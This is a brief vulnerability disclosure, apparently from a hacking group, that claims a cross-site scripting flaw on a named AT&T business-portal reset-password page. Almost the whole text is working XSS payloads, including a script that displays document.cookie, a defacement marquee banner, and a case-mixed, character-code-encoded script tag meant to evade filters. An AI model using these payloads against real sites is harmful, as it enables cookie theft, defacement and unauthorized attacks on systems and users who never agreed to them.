<------------------- header data start ------------------- >

#############################################################

# Application Name : AT&T XSS Vuln.

# Vulnerable Type : Cross Site Scripting

# Author : CYBER WARRIOR BUG RES. - AaCcTt

# Target : https://bizcircle.att.com/reset-password

#############################################################

< ------------------- / header data end of ------------------- >

< -- bug code end of -- >

><iframe onload=alert(/AaCcTt/)>

><script>alert(document.cookie)</script>><marquee><h1>CYBER WARRIOR Bug Researchers AaCcTt</h1></marquee>

></sCRipT>>’><sCRipT>alert(String.fromCharCode(67, 89, 66, 69, 82, 32, 87, 65, 82, 82, 73, 79, 82, 32, 66, 117, 103, 32, 82, 101, 115, 101, 97, 114, 99, 104, 101, 114, 115, 32, 65, 97, 67, 99, 84, 116))</sCRipT>

< -- / bug code end of -- >